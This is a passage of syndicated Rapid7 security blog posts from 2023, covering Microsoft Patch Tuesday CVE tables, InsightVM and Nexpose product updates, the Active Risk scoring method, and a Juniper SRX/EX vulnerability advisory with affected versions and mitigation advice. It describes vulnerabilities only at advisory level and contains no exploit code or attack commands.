CVE-2023-36710 Windows Media Foundation Core Remote Code Execution Vulnerability No No 7.8
CVE-2023-36436 Windows MSHTML Platform Remote Code Execution Vulnerability No No 7.8
CVE-2023-36712 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36726 Windows Internet Key Exchange (IKE) Extension Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36594 Windows Graphics Component Elevation of Privilege Vulnerability No No 7.8
CVE-2023-41766 Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36732 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36731 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36743 Win32k Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36598 Microsoft WDAC ODBC Driver Remote Code Execution Vulnerability No No 7.8
CVE-2023-36593 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.8
CVE-2023-36702 Microsoft DirectMusic Remote Code Execution Vulnerability No No 7.8
CVE-2023-36438 Windows TCP/IP Information Disclosure Vulnerability No No 7.5
CVE-2023-36602 Windows TCP/IP Denial of Service Vulnerability No No 7.5
CVE-2023-36567 Windows Deployment Services Information Disclosure Vulnerability No No 7.5
CVE-2023-36606 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-36581 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-36579 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-36431 Microsoft Message Queuing Denial of Service Vulnerability No No 7.5
CVE-2023-36703 DHCP Server Service Denial of Service Vulnerability No No 7.5
CVE-2023-36585 Active Template Library Denial of Service Vulnerability No No 7.5
CVE-2023-36592 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36591 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36590 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36589 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36583 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36582 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36578 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36575 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36574 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36573 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36572 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36571 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36570 Microsoft Message Queuing Remote Code Execution Vulnerability No No 7.3
CVE-2023-36776 Win32k Elevation of Privilege Vulnerability No No 7
CVE-2023-36697 Microsoft Message Queuing Remote Code Execution Vulnerability No No 6.8
CVE-2023-36564 Windows Search Security Feature Bypass Vulnerability No No 6.5
CVE-2023-29348 Windows Remote Desktop Gateway (RD Gateway) Information Disclosure Vulnerability No No 6.5
CVE-2023-36706 Windows Deployment Services Information Disclosure Vulnerability No No 6.5
CVE-2023-36563 Microsoft WordPad Information Disclosure Vulnerability Yes Yes 6.5
CVE-2023-36724 Windows Power Management Service Information Disclosure Vulnerability No No 5.5
CVE-2023-36713 Windows Common Log File System Driver Information Disclosure Vulnerability No No 5.5
CVE-2023-36584 Windows Mark of the Web Security Feature Bypass Vulnerability No No 5.4
CVE-2023-36722 Active Directory Domain Services Information Disclosure Vulnerability No No 4.4

What’s New in InsightVM and Nexpose: Q3 2023 in Review

Post Syndicated from Roshnee Mistry Shah original https://blog.rapid7.com/2023/09/29/whats-new-in-insightvm-and-nexpose-q3-2023-in-review/

What’s New in InsightVM and Nexpose: Q3 2023 in Review

A lot of new and exciting product updates this quarter to help customers continue driving better security outcomes. We are thrilled to launch a new vulnerability risk scoring strategy this quarter along with upgrades like improved UI for the Engine Pool page, more policy coverage, and more. Let’s take a look at some of the key updates in InsightVM and Nexpose from Q3.

[InsightVM and Nexpose] Introducing Active Risk

We’re excited to launch Active Risk in InsightVM and Nexpose Active Risk is Rapid7’s vulnerability risk-scoring methodology designed to help security teams prioritize vulnerabilities that are actively exploited or most likely to be exploited in the wild.

Our approach takes into account the latest version of the Common Vulnerability Scoring System (CVSS) available for a vulnerability and enriches it with multiple threat intelligence feeds, including proprietary Rapid7 research, to provide security teams with a threat-aware vulnerability risk score. Learn more here.

What’s New in InsightVM and Nexpose: Q3 2023 in Review

[InsightVM] Two new Active Risk dashboard cards

To help security teams communicate the risk posture cross-functionally by providing context on which vulnerabilities need to be prioritized and where the riskiest assets lie, we have launched two new dashboard cards in InsightVM:

  • Vulnerability Findings by Active Risk Score Severity – indicates total number of vulnerabilities across the Active Risk severity levels and number of affected assets and instances. Ideal for executive reporting.
  • Vulnerability Findings by Active Risk Score Severity and Publish Age – shows number of vulnerabilities across the Active Risk severity levels and by publish age. Ideal for sharing with remediation stakeholders to prioritize vulnerabilities for next patch cycle (ex: publish age is between 0-29 days) or identify critical vulnerabilities that may have been missed (ex: publish age is greater than 90 days for critical vulnerabilities).
What’s New in InsightVM and Nexpose: Q3 2023 in Review

[InsightVM and Nexpose] Engine Pool page update

In continuation with the Security Console user interface (UI) upgrades, Engine Pools is now located on its own page and has been updated with a new look. The updated UI can be accessed from the Administration page, and supports both light and dark modes for a more intuitive and consistent user experience.

What’s New in InsightVM and Nexpose: Q3 2023 in Review

[InsightVM and Nexpose] Containerized Scan Engine Kubernetes support

Customers are adopting modern, containerized infrastructure due to its ease of installation and  maintenance (OS upgrades). Containerized Scan Engine delivers the Scan Engine as a packaged or portable application that can easily be deployed to modern infrastructure. Rapid7 customers can now deploy containerized Scan Engine in popular cloud-hosted K8s platforms like Amazon EKS (Elastic Kubernetes Service) and Google GKE. Learn more here.

[InsightVM and Nexpose] Policy coverage for Palo Alto Firewall 10

Customers can now enable policy assessment for Palo Alto 10, a critical firewall technology, in their environments. Policy assessment in InsightVM helps security teams assess the configuration of IT assets against commonly used CIS or DISA STIG benchmarks, allowing them to better meet compliance mandates and proactively secure their environment. You can use the Palo Alto Firewall 10 policy as-is or customize it to meet your business needs. Learn more here.

[InsightVM] Quick Actions in InsightVM

Quick Actions are pre-configured automation actions you can run within InsightVM to automate some of your most frequent tasks like creating an incident with ServiceNow, searching for vulnerabilities with AttackerKB, and more. No configuration is required for leveraging Quick Actions; you don’t need to deploy an orchestrator or create a single connection. Learn more here.

Note: To use Quick Actions, you’ll need an InsightConnect license, which is included at all tiers of the Cloud Risk Complete package.

[InsightVM and Nexpose] Checks for notable vulnerabilities

We have been committed to providing swift coverage for the emergent threats Rapid7 responds to under our Emergent Threat Response (ETR) program. Since Q4 2022, we provided coverage the same day or within 24 hours for almost 30 emergent threats, which includes zero-day vulnerabilities. ETRs we responded to in the past quarter include:

Exploitation of Juniper Networks
On August 17, 2023, Juniper Networks published an out-of-band advisory on four different CVEs affecting Junos OS on SRX and EX Series devices. InsightVM and Nexpose customers can assess their exposure to all four CVEs with vulnerability checks. Learn more here.

CVE-2023-35078 – Critical API Access Vulnerability in Ivanti Endpoint Manager Mobile
CVE-2023-35078 is a remote unauthenticated API access vulnerability in Ivanti Endpoint Manager Mobile, which was previously branded as MobileIron Core. The vulnerability has a CVSS v3 base score of 10.0 and has a severity rating of Critical. An unauthenticated vulnerability check for CVE-2023-35078 is available to InsightVM customers. Learn more here.

Critical Zero-Day Vulnerability in Citrix NetScaler ADC and NetScaler Gateway
Citrix published a security bulletin warning users of three new vulnerabilities affecting NetScaler ADC and NetScaler Gateway. CVE-2023-3519 is known to be exploited in the wild. This product line is a popular target for attackers of all skill levels, and we expect that exploitation will increase quickly. Rapid7 strongly recommends updating to a fixed version on an emergency basis, without waiting for a typical patch cycle to occur. Learn more here.

Active Exploitation of Multiple Adobe ColdFusion Vulnerabilities
Adobe ColdFusion, an application server and a platform for building and deploying web and mobile applications, was affected by multiple CVE this month, including a Rapid7-discovered vulnerability (CVE-2023-29298). Learn more about the vulnerabilities and mitigation guidance here.

15 CVEs Affecting SonicWall
SonicWall published an urgent security advisory warning customers of 15 new vulnerabilities affecting on-premise instances of their Global Management System (GMS) and Analytics products.While these vulnerabilities are not known to be exploited in the wild,  they could allow an attacker to view, modify, or delete data that they are not normally able to retrieve, causing persistent changes to the application’s content or behavior. Learn more here.

Introducing Active Risk

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/09/25/introducing-active-risk/

Introducing Active Risk

Cyber risk is increasing both in volume and velocity. Given the landscape of threats, weaknesses, vulnerabilities, and misconfigurations, organizations, teams and vulnerability analysts alike need of better prioritization mechanisms. That’s why we developed a new risk scoring methodology: Active Risk.

Rapid7 has offered five risk strategies for many years, each strategy with its own specific approach to surfacing that which matters most. Our sixth risk strategy, Active Risk, is designed to focus security and remediation efforts on the vulnerabilities that are actively exploited in the wild or most likely to be exploited.

Active Risk uses CVSS scores along with intelligence from threat feeds like AttackerKB, Metasploit, ExploitDB, Project Heisenberg, CISA KEV list, and other third-party dark web sources to provide security teams with threat-aware vulnerability risk scores on scale of 0-1000.

Active Risk is available via InsightVM, InsightCloudSec, Nexpose, and our recently released Executive Risk View.

Enter Active Risk

Introducing Active Risk

Exploitability has become one of those terms that the security community has maligned, not out of spite, but simply because it’s been applied to too many use cases. Exploitability refers to the ease with which a vulnerability in a computer system, software application, or network can be exploited. But, even that definition can be misleading. Semantics aside, exploitability is really a question of likelihood.

This new risk strategy is focused on delivering unambiguous near-time intelligence, by systematically including a number of threat intelligence sources to enhance vulnerability risk score(s).

There are a number of vulnerability intelligence sources that fuel prioritization in Active Risk, including:

  1. AttackerKB: Launched in 2020, a forum for the security community at large to share insights and views that help cut through all the hype and chaos, with a primary purpose to inform infosec professionals on vulnerabilities and security threats
  2. Project Heisenberg: A network of low interaction honeypots with a singular purpose, to understand what attackers, researchers, and organizations are doing in, across, and against cloud environments. This global network established in 2014, by Rapid7, it records telemetry about connections and incoming attacks to better understand the tactics, techniques, and procedures used by bots and human attackers
  3. Metasploit: Arguably the most widely used, community supported, ethical hacking framework on the planet, used by whitehats, security researchers and generalists in pentesting, <pick-your-color> teaming, CTF drills, education as well as broad or very specialized security assessment exercises
  4. Exploit Database (exploit-db.com): Widely used online repository and reference for security researchers, pentesters, and ethical hackers; it’s become a go-to resource offering an extensive archive of exploits and vulnerabilities, allowing users to track the evolution of security threats over time across software, hardware, and operating systems
  5. CISA Key Exploited Vulnerabilities (KEV) Catalog: Established in 2021 to “provide an authoritative source of vulnerabilities that have been exploited ‘in the wild,’” by the Cybersecurity & Infrastructure Security Agency; witnessing fairly broad and hasty adoption across industries as a method to focus and improve remediation throughput
  6. OSINT and Commercial Feeds: Dependent on the nature of the vulnerability or threat the sources above are combined and validated with additional intelligence and context to enhance prioritization results and ultimately customer outcomes

The immediate value in threat intel data ingestion and normalization alone, that Active Risk delivers, will incentivize and amplify the interest for potential adoption. Active Risk is also CVSS 3.1 compliant across all new CVEs and makes ready future adoption of revised scoring systems (CVSS v4.0 is targeting October 31, 2023 publication). There is strong market demand and intensifying use and application of ‘exploitability’ intelligence as seen in CVSS v4.0 and in CISA KEV as previously mentioned.

Normalize vulnerability risk scoring across cloud and on-prem environments

Active Risk normalizes risk scores across cloud and on-premises environments to effectively assess and collaborate with teams across an organization.

Security teams can leverage Active Risk dashboard cards in InsightVM and Executive Risk View in our Cloud Risk Complete solution to support cross-functional conversations.

Introducing Active Risk

Active Risk is a step change along the path of risk prioritization improvement, and the much longer and windier road we travel together towards improved risk management outcomes.

Rapid7 doubles down on a platform approach for Vulnerability Risk Management

Post Syndicated from Roshnee Mistry Shah original https://blog.rapid7.com/2023/09/20/rapid7-doubles-down-on-a-platform-approach-for-vulnerability-risk-management/

Rapid7 doubles down on a platform approach for Vulnerability Risk Management

This week, Rapid7 was named a Strong Performer in The Forrester Wave™: Vulnerability Risk Management, Q3 2023. The report, which included 11 vulnerability risk management  vendors, represented Rapid7’s inclusion in the Wave report for vulnerability management. We are proud to be recognized for our consolidated platform approach, speedy response to actively exploited emergency vulnerabilities, and a deep commitment to the cybersecurity community through open-source tools and community research.

As organizations move to the cloud, security teams need to adapt their vulnerability management programs to secure their ever-increasing attack surface, including both on-premise assets and more ephemeral cloud resources. While the market has many tools that security teams can use to meet specific use cases—either a component of vulnerability management process or specific technology like Cloud or OT or applications—working with multiple tools/solutions can add to challenges of security operations.

As a result, security teams are continually leaning toward vendors who can consolidate their security needs. Gartner recently stated that “Seventy-five percent of organizations are pursuing a security vendor consolidation—in 2020, this figure was only 29%.  More organizations consolidate to improve risk posture than to save on budget.*” Rapid7 will continue to build a consolidated, practitioner-first platform that helps security teams meet their vulnerability management and compliance needs for a hybrid environment with a single solution.

Building A Comprehensive Risk Management Solution

Our Cloud Risk Complete solution unifies on-prem risk management, cloud security, and application security testing with a practitioner-first approach. It offers security teams:

  • Visibility in their attack surface – Unlock a comprehensive view of risk across applications, cloud environments, and on-prem infrastructure. Forrester gave Rapid7 the perfect score for comprehensive coverage of assets across hybrid environments and provides valuable information regarding assets for several types of remediation teams across a typical enterprise. Our asset coverage includes cloud service providers like AWS, Azure, GCP, Oracle & Alibaba; Applications; Infrastructure – Networking devices; Data; Operating systems and software; OT/IoT coverage; Web Applications and APIs
  • Unlimited risk assessment – Accelerate risk assessment with purpose-built solutions that scan and assess each environment. Our agentless approach in cloud environments allows customers to auto detect new resources and configuration changes within seconds. Project SONAR provides external attack surface visibility. In addition to native scanning capabilities, we continually add to our partner ecosystem and integrations, particularly ingesting 3rd-party assets, including IoT/OT, to help customers maintain complete asset inventory.
  • Enforce compliance and accelerate remediation – A successful VM program looks to remediate risk, efficiently with minimal manual intervention. Rapid7 provides several ways to automate remediation-related tasks – for instance, killing non-gold images and searching for vulnerable applications and containing them – for which Forrester provided us with perfect scores.The built-in automated workflows and third-party integrations (both customizable) helps security teams to drive collaboration and remediate risk faster.
  • Drive operational efficiency and results – with a single vendor that has industry leading solutions across cloud environments, applications and on-prem infrastructure.

As part of helping Security teams reduce risk posed by actively exploited vulnerabilities, our Emergent Threat Response (ETR) program flags multiple CVEs as part of an ongoing process to deliver fast, expert analysis alongside first-rate security content for the highest-priority security threats. You can learn more about the recent threats we have disclosed or responded to here.

As we continue to double down on our strategy of providing a consolidated, comprehensive risk management platform, we’ve made a number of recent investments and product releases, including:

  • Enterprise Risk View – provides the visibility and context needed to track total risk across the entire attack surface (cloud and on-prem) and understand organizational risk posture.
  • Attack Path Analysis – visualize risk across cloud environments in real-time, mapping relationships between compromised resources and the rest of the environment.
  • Active Risk – a unified vulnerability risk scoring and prioritization strategy across hybrid environments

Rapid7 has been a reliable and effective tool allowing us to reduce our vulnerabilities by over 95% and effectively maintain a well patched, well configured environment”. – Director of Cybersecurity at Kutak Rock LLP.

Thank you to our customers and partners for always supporting and guiding us! We’re excited to keep investing in a platform that helps security teams prevent and manage risk from the endpoint to the cloud and simplify security operations.

▶︎ Enterprise Risk View Product Tour

*Source: Gartner, Inc: Top Trends in Cybersecurity — Survey Analysis: Cybersecurity Platform Consolidation, Dionisio Zumerle, John Watt, February 22, 2023

Patch Tuesday – September 2023

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2023/09/12/patch-tuesday-september-2023/

Patch Tuesday - September 2023

Microsoft is addressing 65 vulnerabilities this September Patch Tuesday, including two zero-day vulnerabilities, as well as four critical remote code execution (RCE) vulnerabilities, and six republished third-party vulnerabilities.

Word: zero-day NTLM hash disclosure

Microsoft Word receives a patch for CVE-2023-36761, which is marked as exploited in the wild as well as publicly disclosed; successful exploitation results in disclosure of NTLM hashes, which could provide an attacker with the means to “Pass the Hash” and authenticate remotely without any need to brute force the hash. Microsoft is clearly concerned about the potential impact of CVE-2023-36761, since they are providing patches not only for current versions of Word, but also for Word 2013, which reached its Extended End Date back in April 2023. In March, Microsoft patched CVE-2023-23397, a vulnerability in Outlook which also led to NTLM hash leaks, and which received significant attention at the time.

Streaming Service Proxy: zero-day elevation to SYSTEM

The second second zero-day vulnerability patched this month is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service Proxy, which could grant SYSTEM privileges via exploitation of a kernel driver. Microsoft has detected in-the-wild exploitation, but is not aware of publicly available exploit code. This is a debut Patch Tuesday appearance for Microsoft Streaming Service, but with several researchers from across the globe acknowledged on the advisory, it’s unlikely to be the last. Today’s confirmation of in-the-wild exploitation prior to publication all but guarantees that this will remain an area of interest.

Internet Connection Sharing: same-network critical RCE

CVE-2023-38148 describes a critical remote code execution (RCE) in the Windows Internet Connection Sharing (ICS) functionality. Although the advisory is light on detail, it’s likely that successful exploitation would lead to arbitrary code execution on the ICS host at SYSTEM level. The silver lining is that the attack cannot be carried out from another network, so attackers must first establish an adjacent foothold.

Visual Studio & .NET: critical RCE via malicious package file

This month’s three other critical RCE vulnerabilities have quite a lot in common: CVE-2023-36792, CVE-2023-36793, and CVE-2023-36796 all rely on the user opening a malicious package file, and are thus classed as arbitrary code execution rather than no-interaction RCE. In each case, patches are available for a long list of Visual Studio and .NET installations. Organizations with large developer headcount are likely to be disproportionately at risk.

Exchange (as usual):  RCE

Microsoft is patching five vulnerabilities in Exchange this month. Although Microsoft doesn’t rate any of these higher than “Important” under their proprietary severity rating system, three of the five are RCE vulnerabilities with CVSSv3 base score of 8.0. CVE-2023-36744 CVE-2023-36745, and CVE-2023-36756 would surely receive higher severity if not for several mitigating factors. Successful exploitation requires that the attacker must be present on the same LAN as the Exchange server, and must already possess valid credentials for an Exchange user. Additionally, Microsoft notes that the August 2023 patches already protect against these newly published vulnerabilities, further underscoring the value of timely patching.

SharePoint: elevation to admin

SharePoint receives a patch for CVE-2023-36764, which allows an attacker to achieve administrator privileges via a specially-crafted ASP.NET page. As is often the case with SharePoint vulnerabilities, a level of access is already required, but Site Member privileges are typically widely granted.

Azure DevOps Server: elevation of privilege & RCE

Azure DevOps Server receives two fixes this month. While CVE-2023-38155 requires that an attacker carry out significant recon and preparation of the environment, successful exploitation would lead to administrator privileges. Potentially of greater concern is CVE-2023-33136, which allows an attacker with Queue Build permissions to abuse an overridable input variable to achieve RCE. While most DevOps Server installations are hopefully managed by people both willing and able to apply prompt upgrades, CI/CD environments are prime targets for supply chain attacks.

They do it with Mira

A vulnerability in the Windows implementation of wireless display standard Miracast allows for an unauthenticated user to project to a vulnerable system. Although CVE-2023-38147 requires that an attacker be in close physical proximity to the target, consider that wireless display technology is often used in high-traffic environments such as conventions, which could allow an opportunistic attacker to inflict reputational damage. While exploitation requires that the target asset is configured to allow “Projecting to this PC” and marked as “Available Everywhere” – and Microsoft points out that this is not the default configuration – most administrators will know from long experience that many users will simply select whichever options cause them the least friction.

Summary Charts

Patch Tuesday - September 2023
A relatively light month, albeit with some seldom-seen components like Streaming Service and Internet Connection Sharing.
Patch Tuesday - September 2023
Still holding the #1 spot: Remote Code Excution.
Patch Tuesday - September 2023
The typical cluster around 8.0.
Patch Tuesday - September 2023
3D Builder: not as innocent as it looks.

Summary Table

Apps vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36760 3D Viewer Remote Code Execution Vulnerability No No 7.8
CVE-2023-36740 3D Viewer Remote Code Execution Vulnerability No No 7.8
CVE-2023-36739 3D Viewer Remote Code Execution Vulnerability No No 7.8
CVE-2023-36773 3D Builder Remote Code Execution Vulnerability No No 7.8
CVE-2023-36772 3D Builder Remote Code Execution Vulnerability No No 7.8
CVE-2023-36771 3D Builder Remote Code Execution Vulnerability No No 7.8
CVE-2023-36770 3D Builder Remote Code Execution Vulnerability No No 7.8
CVE-2022-41303 AutoDesk: CVE-2022-41303 use-after-free vulnerability in Autodesk® FBX® SDK 2020 or prior No No N/A

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-29332 Microsoft Azure Kubernetes Service Elevation of Privilege Vulnerability No No 7.5
CVE-2023-38156 Azure HDInsight Apache Ambari Elevation of Privilege Vulnerability No No 7.2
CVE-2023-36736 Microsoft Identity Linux Broker Remote Code Execution Vulnerability No No 4.4

Azure Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-33136 Azure DevOps Server Remote Code Execution Vulnerability No No 8.8
CVE-2023-38155 Azure DevOps Server Remote Code Execution Vulnerability No No 7

Browser vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-4863 Chromium: CVE-2023-4863 Heap buffer overflow in WebP No No N/A
CVE-2023-4764 Chromium: CVE-2023-4764 Incorrect security UI in BFCache No No N/A
CVE-2023-4763 Chromium: CVE-2023-4763 Use after free in Networks No No N/A
CVE-2023-4762 Chromium: CVE-2023-4762 Type Confusion in V8 No No N/A
CVE-2023-4761 Chromium: CVE-2023-4761 Out of bounds memory access in FedCM No No N/A

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36796 Visual Studio Remote Code Execution Vulnerability No No 7.8
CVE-2023-36793 Visual Studio Remote Code Execution Vulnerability No No 7.8
CVE-2023-36792 Visual Studio Remote Code Execution Vulnerability No No 7.8
CVE-2023-36794 Visual Studio Remote Code Execution Vulnerability No No 7.8
CVE-2023-36758 Visual Studio Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36742 Visual Studio Code Remote Code Execution Vulnerability No No 7.8
CVE-2023-36788 .NET Framework Remote Code Execution Vulnerability No No 7.8
CVE-2023-36759 Visual Studio Elevation of Privilege Vulnerability No No 6.7
CVE-2023-36799 .NET Core and Visual Studio Denial of Service Vulnerability No No 6.5
CVE-2023-39956 Electron: CVE-2023-39956 -Visual Studio Code Remote Code Execution Vulnerability No No N/A

Exchange Server vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36757 Microsoft Exchange Server Spoofing Vulnerability No No 8
CVE-2023-36756 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8
CVE-2023-36745 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8
CVE-2023-36744 Microsoft Exchange Server Remote Code Execution Vulnerability No No 8
CVE-2023-36777 Microsoft Exchange Server Information Disclosure Vulnerability No No 5.7

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36886 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 7.6
CVE-2023-38164 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability No No 7.6
CVE-2023-36800 Dynamics Finance and Operations Cross-site Scripting Vulnerability No No 7.6

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-36764 Microsoft SharePoint Server Elevation of Privilege Vulnerability No No 8.8
CVE-2023-36765 Microsoft Office Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36766 Microsoft Excel Information Disclosure Vulnerability No No 7.8
CVE-2023-36763 Microsoft Outlook Information Disclosure Vulnerability No No 7.5
CVE-2023-36762 Microsoft Word Remote Code Execution Vulnerability No No 7.3
CVE-2023-36761 Microsoft Word Information Disclosure Vulnerability Yes Yes 6.2
CVE-2023-41764 Microsoft Office Spoofing Vulnerability No No 5.5
CVE-2023-36767 Microsoft Office Security Feature Bypass Vulnerability No No 4.3

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38163 Windows Defender Attack Surface Reduction Security Feature Bypass No No 7.8

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38146 Windows Themes Remote Code Execution Vulnerability No No 8.8
CVE-2023-38147 Windows Miracast Wireless Display Remote Code Execution Vulnerability No No 8.8
CVE-2023-38148 Internet Connection Sharing (ICS) Remote Code Execution Vulnerability No No 8.8
CVE-2023-38150 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-35355 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36802 Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability Yes No 7.8
CVE-2023-38162 DHCP Server Service Denial of Service Vulnerability No No 7.5
CVE-2023-36805 Windows MSHTML Platform Security Feature Bypass Vulnerability No No 7
CVE-2023-38140 Windows Kernel Information Disclosure Vulnerability No No 5.5
CVE-2023-36803 Windows Kernel Information Disclosure Vulnerability No No 5.5

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2023-38142 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38141 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38139 Windows Kernel Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38161 Windows GDI Elevation of Privilege Vulnerability No No 7.8
CVE-2023-36804 Windows GDI Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38144 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38143 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2023-38149 Windows TCP/IP Denial of Service Vulnerability No No 7.5
CVE-2023-38160 Windows TCP/IP Information Disclosure Vulnerability No No 5.5
CVE-2023-38152 DHCP Server Service Information Disclosure Vulnerability No No 5.3
CVE-2023-36801 DHCP Server Service Information Disclosure Vulnerability No No 5.3

Exploitation of Juniper Networks SRX Series and EX Series Devices

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2023/08/31/etr-exploitation-of-juniper-networks-srx-series-and-ex-series-devices/

Exploitation of Juniper Networks SRX Series and EX Series Devices

On August 17, 2023, Juniper Networks published an out-of-band advisory on four different CVEs affecting Junos OS on SRX and EX Series devices:

CVE-2023-36846 Affects the SRX Series

A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request that doesn’t require authentication, an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system, which may allow chaining to other vulnerabilities.

CVE-2023-36844 Affects the EX Series

A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain important environment variables. Utilizing a crafted request, an attacker is able to modify certain PHP environments variables. This would lead to partial loss of integrity, which may allow chaining to other vulnerabilities.

CVE-2023-36847 Affects the EX Series

A Missing Authentication for Critical Function vulnerability in Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request that doesn’t require authentication, an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system, which may allow chaining to other vulnerabilities.

CVE-2023-36845 Affects the EX and SRX Series

When chained, the vulnerabilities permit an unauthenticated user to upload an arbitrary file to the JunOS file system and then execute it. It’s unclear exactly which issues need to be chained together — our research team was able to execute an attack chain successfully, but we did not determine exact CVE mappings. Security organization Shadowserver posted on social media this week that they’d been seeing exploit attempts against “CVE-2023-36844 and friends” since August 25.

Further Context

Platform mitigations make executing an arbitrary binary difficult, but a public proof of concept and associated write-up from watchTowr demonstrate how to execute arbitrary PHP code in the context of the root user. Notably, the attack chain does not allow for operating system-level code execution — instead, it gives the attacker code execution within a BSD jail, which is a stripped-down environment designed to run a single application (in this case the HTTP server). Jails have their own set of users and their own root account which are limited to the jail environment, per BSD documentation.

The vulnerabilities affect the Juniper EX Series (switches) and SRX Series (firewalls). While the issue is on the management interface, these devices tend to have privileged access to corporate networks, and even with code execution restricted to a BSD jail, successful exploitation would likely provide an opportunity for attackers to pivot to organizations’ internal networks.

Juniper software is widely deployed, and Shodan shows around 10,000 devices facing the internet, although we can’t say with certainty how many are vulnerable. The affected Juniper service is J-Web, which is enabled by default on ports 80 and 443. The CVEs from Juniper are ranked as CVSS 5.3, but the advisory shows a combined CVSS score of 9.8. This sends a mixed message that might confuse users into thinking the impact of the flaws is of only moderate severity, which it is not.

Organizations that are not able to apply the patch should disable J-Web or restrict access to only trusted hosts. See the Juniper Networks advisory for more information.

Affected Products

CVE-2023-36845 and CVE-2023-36846 affect Juniper Networks Junos OS on the following versions of SRX Series:

  • All versions prior to 20.4R3-S8
  • 21.1 version 21.1R1 and later versions
  • 21.2 versions prior to 21.2R3-S6
  • 21.3 versions prior to 21.3R3-S5
  • 21.4 versions prior to 21.4R3-S5
  • 22.1 versions prior to 22.1R3-S3
  • 22.2 versions prior to 22.2R3-S2
  • 22.3 versions prior to 22.3R2-S2, 22.3R3
  • 22.4 versions prior to 22.4R2-S1, 22.4R3

CVE-2023-36844 and CVE-2023-36847 affect Juniper Networks Junos OS on the following versions of EX Series:

  • All versions prior to 20.4R3-S8
  • 21.1 version 21.1R1 and later versions
  • 21.2 versions prior to 21.2R3-S6
  • 21.3 versions prior to 21.3R3-S5
  • 21.4 versions prior to 21.4R3-S4
  • 22.1 versions prior to 22.1R3-S3
  • 22.2 versions prior to 22.2R3-S1
  • 22.3 versions prior to 22.3R2-S2, 22.3R3
  • 22.4 versions prior to 22.4R2-S1, 22.4R3

The vulnerability affects the J-Web component, which, by default, listens on ports 80 and 443 of the management interface.

Mitigation Guidance

Organizations should patch their devices as soon as is practical. Those that are not able to apply the patch should disable J-Web or restrict access to only trusted hosts. See the Juniper Networks advisory for more information.

Rapid7 Customers

InsightVM and Nexpose customers can assess their exposure to all four CVEs with vulnerability checks released in the August 17 content release.

What’s New in CVSS v4

Post Syndicated from Devin Krugly original https://blog.rapid7.com/2023/08/14/whats-new-in-cvss-v4/

What's New in CVSS v4

The pending update to the Common Common Vulnerability Scoring System (CVSS), version 4.0, has garnered a noticeable volume of articles, blog posts and watercooler (now known as Slack and Zoom) air time. Reaction from the community has been positive, with general sentiment pinned somewhere near “practical.”

